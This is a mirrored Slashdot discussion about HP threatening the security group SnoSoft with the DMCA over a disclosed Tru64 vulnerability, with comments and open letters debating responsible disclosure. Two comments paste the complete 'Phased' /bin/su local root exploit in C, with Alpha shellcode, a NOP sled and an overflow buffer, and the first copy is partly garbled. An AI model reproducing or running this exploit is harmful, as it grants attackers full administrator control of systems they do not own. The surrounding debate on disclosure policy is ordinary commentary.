Slashdot Mirror
HP Uses DMCA To Quash Vulnerability Publication
Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
"On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "
Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
Come to the University of Mars! Classes starting soon!
This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...
Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.
Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).
It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."
As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.
Schwab
Editor, A1-AAA AmeriCaptions
HP should be thanking them
This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just only leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.
There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.
#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h
char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j; char buffer[8239]; char payload[15200];
char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i8233;i++) buffer[i] = 0x41;
buffer[i++] = 0x01; buffer[i++] = 0x04;
buffer[i++] = 0x01; buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?
The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CD's, swap DVD's, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.
If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?
Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.
OK, so I'm a broken record.
Necessity is the plea for every infringement of human freedom. It is the argument of tyrants; it is the creed of slaves.
Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.
Zoe Brain - Rocket Scientist
I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.
The first issue is HP's request that Bruce Parens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.
The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.
Please reconsider your decision to use the Digital Millenium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.
I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.
The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge free of speech or of the press.
"The only law shalt be maximixe your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. The is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.
I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.
Search 2010 Gen Con events
Mrs Fiorina,
I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.
Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.
Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.
This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.
I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to reccomend that anyone give their money to Hewlett Packard.
Looking forward to your response.
[Name Removed]
--
"I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett
Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.
This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irrepairable damage to HP.
We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?
It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.
Thanks
Bruce
Bruce Perens.
In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:
Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?
I would hate to be manipulated in a shakedown of my own company.
On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.
What do you think?
Bruce
Bruce Perens.
Bruce
Bruce Perens.
#include <stdio.h>
/* 0x140010401 */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
Bruce,
I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.
I have been working with Compaq and HP systems my entire career, Intel based servers, UNIX servers and workstations, printer and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.
As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information, given the nature of many of the parties involved I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly the situation gets complicated, the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light, I suspect that the group has acted in bad faith or at least "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.
However the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on it's head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The chances are good that SnoSoft has discovered a problem that others know about or are explioting can not be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine, I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them then that is what I will do.
Regardless of the events leading to Mr. Ferson's letter to SnoSoft HP must clarify their position on this situation. I would hope that you are willing to state that provided no illegal methods were used to discover the vulnerability HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breech of contract it is a matter for civil courts.
Aaron Schneider
Manager, Information Technology
Fabutan Sun Tan Studios
Schneider@fabutan.com